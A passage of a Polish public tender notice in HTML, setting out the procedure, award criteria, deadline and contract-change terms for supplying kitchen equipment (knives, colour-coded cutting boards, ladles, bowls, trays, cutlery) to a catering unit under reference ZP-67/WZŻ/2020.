</div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena oferty brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin realizacji zamówienia </TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.Zmiana niniejszej umowy może nastąpić na warunkach w niej określonych na piśmie pod rygorem nieważności.2.Zamawiający przewiduje zmianę postanowień umowy w przypadku:1)gdy urządzenia których dostarczanie stanowi przedmiot umowy nie będzie dostępne na rynku z powodu zaprzestania ich produkcji, pod warunkiem, że zamienne urządzenia spełniają wymagania zawarte w SIWZ dotyczące przedmiotu zamówienia oraz pod warunkiem, ze cena nie ulega podwyższeniu,3.Zmiany osób przewidzianych do współpracy, wskazanych w §9. Zmiana ta nie wymaga aneksu lecz pisemnego zawiadomienia Stron umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-07-15</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język POLSKI</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dostawę wyposażenia pionu żywienia z podziałem na trzy zadania. ZADANIE 1 Dostawa drobnego sprzętu do wyposażenia kuchni ZADANIE 2 Dostawa garnków, pojemników GN ZADANIE 3 Dostawa kubków, misek, talerzy, łyżeczek Znak postępowania: ZP-67/WZŻ/2020</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nóż kuchenny kuty o długości min.25 cm. Wykonany z kutego pręta stalowego.Jakość stali węglowej klasy X50CrMoV15 lub równowaznej. Rękojeść dopasowana w sposób uniemożliwiający gromadzenie się resztek w miejscach łączenia. Nadaje się do mycia w zmywarkach gastronomicznych.	szt. 1"Deska do krojenia z polipropylenu w kolorze niebieskim - do ryb. Deska dwustronna: jedna strona z wycięciem wzdłuż krawędzi, druga gładka.Wymiary (dł; szer; wys):60x40 cm (+/-2cm)Grubość:min. 1.8 cm.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 1"Deska do krojenia z polipropylenu w kolorze czerwonym - do mięsa surowego. Deska dwustronna: jedna strona z wycięciem wzdłuż krawędzi, druga gładka.Wymiary (dł; szer; wys):60x40 cm (+/-2cm)Grubość:min.1.8 cm.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 2"Deska do krojenia HACCP w kolorze zielonym wykonana z polietylenu HDPE 500 przeznaczona do warzyw.Wymiary (dł; szer; wys):60x40x1.8 cm Grubość:min.1.8 cm.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 2"Deska do krojenia HACCP w kolorze białym wykonana z polietylenu HDPE 500 przeznaczona do nabiału i pieczywa.Wymiary (dł; szer; wys):60x40x1.8 cm.(+/-5cm)Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 1"Deska do krojenia HACCP PE wykonana z nietoksycznego polietylenu 500 (lub równoważnego)o wysokiej gęstości. Produkt w kolorze zielonym - do warzyw i owoców.Deska jest odporna do temperatury 70st C. Wymiary (dł; szer; wys):45x30 cm (+/-2cm)Z możliwością mycia w zmywarce.Grubość:min.1.3 cm.Dopuszczona do kontaktu z żywnością."	szt. 2"Deska do krojenia HACCP PE wykonana z nietoksycznego polietylenu 500 (lub równoważnego)o wysokiej gęstości. Produkt w kolorze żółtym - do mięsa drobiowego.Deska jest odporna do temperatury 70st C. Wymiary (dł; szer; wys):45x30 cm (+/-2cm)Grubość:min.1.3 cm.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 2"Deska do krojenia HACCP PE wykonana z nietoksycznego polietylenu 500 o wysokiej gęstości. Produkt w kolorze niebieskim - do ryb i owoców morza.Deska jest odporna do temperatury 70st C. Wymiary (dł; szer; wys):45x30 cm (+/-2cm)Grubość:min.1.3 cm.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 2"Deska do krojenia z polietylenu o wymiarach 50x38 cm (+/-2cm). Kolor czerwony-do miesa. Wymiary (dł; szer; wys):50x38 cm(+/-2cm)Grubość:1.2 cm-1,5cm.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 2"Deska do krojenia z polietylenu w kolorze brązowym do wędlin i mięsa gotowanego.Wymiary (dł; szer; wys):45x30 cm (+/-2cm)Grubość:min.1.3 cm.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 2"Deska do krojenia z polietylenu o wymiarach 50x38 cm. Kolor biały - do nabiału i pieczywa. Wytłoczona na powierzchni deski miarka od 0 do 40 cm ułatwia krojenie na równe kawałki.Wymiary (dł; szer; wys):50x38 cm (+/-2cm)Grubość:1.2 cm.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 3Deska do krojenia z polietylenu o wymiarach 50x38 cm. (+/-2cm)Kolor brązowy - do mięs gotowanych,wędlin. Wytłoczona na powierzchni deski miarka od 0 do 40 cm ułatwia krojenie na równe kawałki.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce.	szt. 2"Sitko stożkowe wykonane ze stali nierdzewnej.Wysokość:17 cm (+/-2cm)średnica:20 cm(+/-2cm)średnica oczek:min.1.8 mm.Dopuszczone do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 1"Wanna cedzakowastal polerowana.Średnica : 320 mm (+/-30mm)Wysokość - H : min.170 mm.Deklaracja zgodności załączona do produktu.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 1"Rózga Materiał wykonania : stal nierdzewnaDługość - L : min.300 mm.Deklaracja zgodności załączona do produktu.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 2"Łyżeczka cedzakowaWykonana ze stali chromowanej,otwory do szybkiego ociekania.Materiał wykonania : stal chromowana.Deklaracja zgodności załączona do produktu.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce.Średnica : 240 mm (+/-40mm)Długość - L : 570 mm (+/-50mm)"	szt. 1"Łyżeczka cedzakowaWykonana ze stali nierdzewnejczęść robocza wyprofilowana do użytku z naczyniami o mniejszych średnicachduże otwory do szybkiego ociekania.Materiał wykonania : stal nierdzewna.Deklaracja zgodności załączona do produktu.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce.Średnica : 160 mm (+/-2cm)Długość - L : min.350 mm"	szt. 1"Nóż do krojenia ryb Antypoślizgowa rękojeść wykonana z min.dwóch rodzajów tworzywa, twardego (np.kolor czerwony), oraz miękkiego (np.kolor zielony)ostrze ze stali chromowo-molibdenowej, o twardości 50-65HRCmożna myć w zmywarce i wyparzać.Długość - L : 330 mm (+/-30mm)Deklaracja zgodności załączona do produktu.Dopuszczona do kontaktu z żywnością"	szt. 1"Nóż do krojenia mięsa Ostrze wykonane z wysokiej jakości stali węglowej. Kuty na gorąco z jednego kawałka stali. Specjalny stop stali chromowo-molibdenowo-wanadowej.Higieniczna konstrukcja rękojeści uniemożliwia gromadzenie się resztek w miejscach łączenia.Nóż dostarczany w blistrze. Długość całego noża 33 cm (+/-3cm)Deklaracja zgodności załączona do produktu.Dopuszczona do kontaktu z żywnością"	szt. 1Suszarka na talerze wykonana ze stali nierdzewnej.wymiary 61cm/ 91,5cm (+/-5cm).Pozwala na ułożenie min.20 talerzy.	szt. 1"Wyciskacz do czosnku wykonany z aluminium pokrytym powłoką PTFE (lub równoważną).DŁUGOŚĆ: min175 mmMATERIAŁ: aluminium/stalDopuszczony do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 2"Łopatka kątowa przeznaczona do cukierni i piekarni. Wymiary łopatki: 170x80 mm (+/-10mm)DŁUGOŚĆ: 360 mm (+/-10mm)SZEROKOŚĆ: 80 mm (+/-10mm)MATERIAŁ: stal nierdzewnatworzywo sztuczne (rączka)Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 1" Wałek do ciasta, wykonany jest ze stali nierdzewnej (powierzania pokryta jest materiałem nieprzywierającym)- Wykonany ze stali nierdzewnej- Powierzchnia wałka pokryta materiałem nieprzywierającym- Oparty na tulejach ślizgowych- W zestawie stojak chromowany- Waga: 1,65 kg (+/-0,2kg)"	szt. 1Miska ze stali nierdzewnej Materiał: stal nierdzewna.Ø27cm (+/-2cm) .Pojemność 4L.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce.	szt. 4Miska ze stali nierdzewnej Materiał: stal nierdzewna.min.Ø25cm .Wysokość min.9 cm.Pojemnośćmin. 3,3L.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce.	szt. 4"Chochla ze stali nierdzewnej.Pozbawiona spawów i zagięć- Wykonana z jednego kawałka stali, dzięki czemu spełnia normy higieny HACCP- Wykonana z wysokiej jakości stali nierdzewnej. Pojemność min. 1l.Dlugość 480mm (+/-50mm), średnica 165mm (+/-15mm)- Wywinięty brzeg zapobiega kapaniu podczas nalewania- Grubość uchwytu min.4mm- Można myć w zmywarkach"	szt. 2"Chochla.stal nierdzewna 18/10, wysokopolerowana. Wykonana z wysokiej jakości stali nierdzewnej. Pojemność min.125ml.Dlugość 290mm (+/-15mm), - Można myć w zmywarkach"	szt. 9"Chochla.stal nierdzewna 18/10, wysokopolerowana. Wykonana z wysokiej jakości stali nierdzewnej. Pojemność min.200ml.Długość 400mm (+/-50mm), - Można myć w zmywarkach"	szt. 9"Taca z szarego polipropylenu o wysokim rancie i teksturze powierzchni zapobiegającej ześlizgnięciu się potraw czy napojów. Można myć w zmywarkach do temperatury 80 stopni Celsjusza. Podlega recyklingowi. DŁUGOŚĆ: min.450 mmSZEROKOŚĆ: 350 mm (+/-20mm)WYSOKOŚĆ: 20 mm (+/-10%)MATERIAŁ: polipropylenKOLOR: szaryDopuszczone do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 15"Dzbanek miarka wykonany ze stali nierdzewnej.Pojemność:2 l (+/-10%)Wysokość:17.5 cm( +/-50mm)Dopuszczone do kontaktu z żywnością.Z możliwością mycia w zmywarce.średnica:14 cm( +/-50mm)"	szt. 2"Pojemnik okrągły na żywnośćWykonany z półprzezroczystego polipropylenuBezpieczny dla żywności.WYSOKOŚĆ: 125 mm(+/-20mm)ŚREDNICA: 105 mm(+/-20mm)POJEMNOŚĆ: min.0.95 lMożna myć w zmywarce, używać w mikrofalówkach oraz mrozićMożna sztaplowaćHermetyczna i wodoszczelna pokrywa z wymienną silikonową uszczelką.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 6"ubijak do ziemniaków DŁUGOŚĆ: 800 mm(+/-20mm)SZEROKOŚĆ: 152 mm(+/-20mm)WYSOKOŚĆ: 83 mm(+/-20mm) Ubijak wykonany ze stali nierdzewnej z uchwytem o średnicy min.30 mmGATUNEK STALI NIERDZEWNEJ: 18/10.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 1"Ubijak do ziemniaków wykonany ze stali nierdzewnej.DŁUGOŚĆ: 460 mm (+/-20mm)KOLOR: inox.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce."	szt. 1"Tarka do jarzynwykonana z wysokopolerowanej stali nierdzewnej 18/10. Szerokość: 110 x 85 mm.(+/-5mm)WYSOKOŚĆ: 240 mmMATERIAŁ: stal nierdzewnaGATUNEK STALI NIERDZEWNEJ: 18/10Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce.KOLOR: inox"	szt. 1" Nóż do obierania- Antypoślizgowy uchwyt zmniejszający nacisk.Kolor rączki czarny, stalowe ostrze. Poziome ustawienie ostrza. Gruba i bardzo wygodna rękojeść antypoślizgowa . Ostrze ze stali nierdzewnej Zabezpieczenie przed skaleczeniem - podczas obierania przesuwa sie z ostrza Uszko do powieszenia Można myć w zmywarce"	szt. 3"Nóż do jarzyn Wymiary: min.9 cmMateriał: stal Waga: 420 g (+/-20g)Ostre ostrze odporne na odbarwieniaMiękki uchwyt dla wygodnego użytkowaniaDostosowano do czyszczenia w zmywarce"	szt. 12Sztućce do kuchni i pokoju socjalnego Produkt wykonany ze stali 18/10. Sztućce polerowane. W skład zestawu wchodzą: min.6 noży stołowych, 6 widelców stołowych, 6 łyżek stołowych, 6 łyżeczek do herbaty.Sztućce o prostym wzorze.WAGA: 2.1 kg(+/-0,2kg)Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce.	szt. 1Stojak na deski do krojenia wykonany ze stali nierdzewnej na min. 6 desek.Wymiary (dł; szer; wys):30x27x27 cm (+/- 7mm)	szt. 1Pojemnik na sztućce GN 1/1. Posiada min.4 przestronne przegrody. Można sztaplować. Łatwy w czyszczeniu.Kolor szary polipropylen.Wymiary (dł; szer; wys):53x32.5x10 cm (+/-5cm).Wykonany z tworzywa sztucznego o dużej wytrzymałości.waga: 0,7 kg. (+/-0,2kg)	szt. 10Łopatka wykonana z czarnego poliamidu lub materiału równoważnego. Polecana do garnków, patelni i innych naczyń z powłoką typu np.non-stick. Wytrzymuje temperaturę do 220 stopni Celsjusza. Można myć w zmywarkach. Wymiar bez uchwytu: 130 x 65 mm(+/-8mm)długość całkowita:min. 290 mm.Dopuszczona do kontaktu z żywnością.Z możliwością mycia w zmywarce.	szt. 4<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39220000-0, 39221000-7, 39221120-4, 39221210-2, 39223100-2, 39221180-2, 39221130-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 